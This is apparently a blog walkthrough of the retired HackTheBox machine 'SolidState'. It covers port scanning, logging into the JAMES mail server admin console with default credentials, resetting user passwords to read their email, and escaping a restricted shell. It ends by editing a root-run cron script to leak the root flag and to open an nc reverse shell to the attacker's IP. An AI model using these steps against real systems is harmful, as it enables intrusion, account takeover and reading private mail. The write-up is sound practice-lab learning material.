HacktheBox.eu - Retired - solidstate
Recon
So I start as always with a simple UP/Down scan
nmap -T4 -p- -oX ./nmapb.xml solidstate.htb
Then I convert that to HTML to make it pretty
xsltproc ./nmapb.xml -o ./nmapb.html
Thats a goodly amount of open ports
22,25,80,110,119,4555
Let’s scan with nmap again with the -A switch to run all the scripts against those ports.
nmap -T4 -p22,25,80,110,119,4555 -A -oX ./nmapf.xml solidstate.htb
Then I convert that to HTML also
xsltproc ./nmapf.xml -o ./nmapf.htm
Ok we got open ssh 7.4.1 on 22 apache 2.4.25 on 80 and a bunch of stuff that says james($service) on 25,110,119 and 4555
James is a mail server for apache
Java Apache Mail Enterprise Server
So it makes sense to see 25(smtp), 110(pop3),119(nntp?) and 4555 which is some sort of remote admin for james
Let’s check out port 80
Exploit
Checking around for vulnerabilities in JAMES i found this
https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7
Which creates a new user and executes code the next time that user logs in…
For grins and giggles it says the james default admin is root/root
I opened telnet just to see and…
Cool root/root works lets poke around starting with the help command to see what we can do.
Listusers, lets get some info
So the setpassword is interesting too. We can change the users passwords then login to their pop account and read their emails.
Here is a blog about looking at pop through the command line
https://www.shellhacks.com/retrieve-email-pop3-server-command-line/
The user Mindy was the first that had any email in it that I tested.
A welcome email and a password
Username: mindy
Pass: P@55W0rd1!2@
There also one other email in Johns mailbox
I wonder if mindy changed her password their password as instructed in the email?
Let’s see if we can ssh as mindy
Ssh mindy@solidstate.htb
Let’s see what is in Mindy’s folder?
That was quick
Ok lets pivot to privilege escalation.
Ok here is the thing though mindy is stuck with a restricted shell and can’t do a lot of commands.. Like even change directory.
We need to escape out of this bash hell
Eventually I tried doing another ssh session where it ignores the profile
ssh mindy@solidstate.htb -t "bash --noprofile"
Its uglier, but at least we have some power
Poking around the os I found this in /opt
A script that belongs to root… that we have write access too :)
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Its just goes in an deletes everything in the /tmp folder.
I think this is running on a schedule because I’ve already seen some of my tools disappear from /tmp
So easy win here is just to change this to dump the /root/root.txt file out to the /tmp directory were we can read it..
Import os
os.system(“cat /root/root.txt > /tmp/root.xt”)
Then wait a minute for it to run
That was easy.. But let’s get a root shell too, which should be really simple
Just modify our tmp.py
Import os
os.system(“nc -e /bin/bash 10.10.14.18 5555”)
And wait for the minute to change
And here is the job that is running tmp.py
Comments
Post a Comment